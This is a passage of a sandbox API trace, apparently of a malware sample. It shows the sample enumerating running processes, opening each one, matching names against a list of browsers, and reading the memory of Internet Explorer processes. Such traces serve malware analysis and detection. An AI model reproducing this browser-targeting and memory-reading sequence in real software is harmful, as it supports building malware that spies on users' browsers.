	[0248.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0248.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0248.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0248.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9ad0
	[0248.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.123] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0248.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.124] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.124] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0248.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.125] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0248.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9ad4
	[0248.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.127] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0248.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.127] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.128] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0248.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.128] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0248.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9ad8
	[0248.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.129] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0248.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.129] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.130] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0248.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.130] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0248.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9adc
	[0248.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.131] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0248.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.132] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.133] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0248.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.133] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0248.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9ae0
	[0248.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.135] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0248.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.136] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.136] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0248.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.137] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0248.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9ae4
	[0248.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.138] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0248.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.139] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.139] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0248.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.139] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0248.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9ae8
	[0248.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.141] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0248.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.142] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.142] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0248.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.143] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0248.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9aec
	[0248.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.145] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0248.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.145] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.146] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0248.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.147] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0248.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9af0
	[0248.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.149] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0248.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.149] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.149] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0248.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.180] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.181] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0248.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9af4
	[0248.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.191] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0248.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.191] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.192] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0248.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.192] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0248.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9af8
	[0248.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.193] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0248.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.194] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.194] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0248.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.195] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.195] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0248.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9afc
	[0248.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.196] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0248.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.197] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.198] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0248.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.198] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0248.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9b00
	[0248.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.200] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0248.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.200] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.201] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0248.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.201] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0248.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9b04
	[0248.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.203] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0248.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.204] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.204] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0248.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.205] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0248.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9b08
	[0248.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.206] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0248.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.207] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.207] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0248.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.208] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9b0c
	[0248.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.210] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.210] NtQueryInformationProcess (in: ProcessHandle=0x9b0c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.210] ReadProcessMemory (in: hProcess=0x9b0c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.210] ReadProcessMemory (in: hProcess=0x9b0c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.210] ReadProcessMemory (in: hProcess=0x9b0c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.210] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9b10
	[0248.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.212] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.212] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.213] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.213] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.213] NtQueryInformationProcess (in: ProcessHandle=0x9b10, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.213] ReadProcessMemory (in: hProcess=0x9b10, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.214] ReadProcessMemory (in: hProcess=0x9b10, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.214] ReadProcessMemory (in: hProcess=0x9b10, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.214] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9b14
	[0248.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.215] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.215] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.215] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.216] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.216] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0248.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9b18
	[0248.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.217] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0248.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.217] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.218] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0248.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.218] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9b1c
	[0248.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.219] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.219] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.220] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.220] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9b20
	[0248.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.222] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.223] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.223] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.224] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.225] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9b24
	[0248.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.225] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.225] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.225] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.226] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
